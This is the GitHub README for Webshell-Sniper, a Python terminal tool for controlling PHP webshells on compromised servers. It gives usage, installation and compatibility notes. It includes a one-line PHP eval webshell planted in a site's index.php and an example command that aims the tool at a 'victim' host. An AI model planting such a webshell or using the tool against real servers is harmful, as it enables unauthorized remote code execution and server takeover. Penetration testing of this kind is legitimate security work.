Skip to content

WangYihang/Webshell-Sniper

Repository files navigation

Webshell-Sniper

A webshell manager via terminal

Backers on Open Collective Sponsors on Open Collective

Usage :

Usage : 
        python webshell-sniper.py [URL] [METHOD] [AUTH]
Example : 
        python webshell-sniper.py http://127.0.0.1/c.php POST c
Author : 
        WangYihang <wangyihanger@gmail.com>
# cat /var/www/html/index.php
<?php eval($_POST['s3cr3t']);?>
# python webshell-sniper.py http://victim.com/index.php POST s3cr3t
...

Installation:

git clone https://github.com/WangYihang/Webshell-Sniper
cd Webshell-Sniper
pip install -r requirements.txt

Example :

v1.1.2

A Pentest Example via Webshell-Sniper (YouTube)

Compatibility :

Enviroment :
    Attacker :
        Linux
        python 2.7
    Victim :
        apache 2.4
        php 7.0

Addations:

  1. This tool only support to run on unix-like system.
  2. It is able to help user control web server which is running PHP or MySQL.

Contributors

This project exists thanks to all the people who contribute.

Backers

Thank you to all our backers! 🙏 [Become a backer]

Sponsors

Support this project by becoming a sponsor. Your logo will show up here with a link to your website. [Become a sponsor]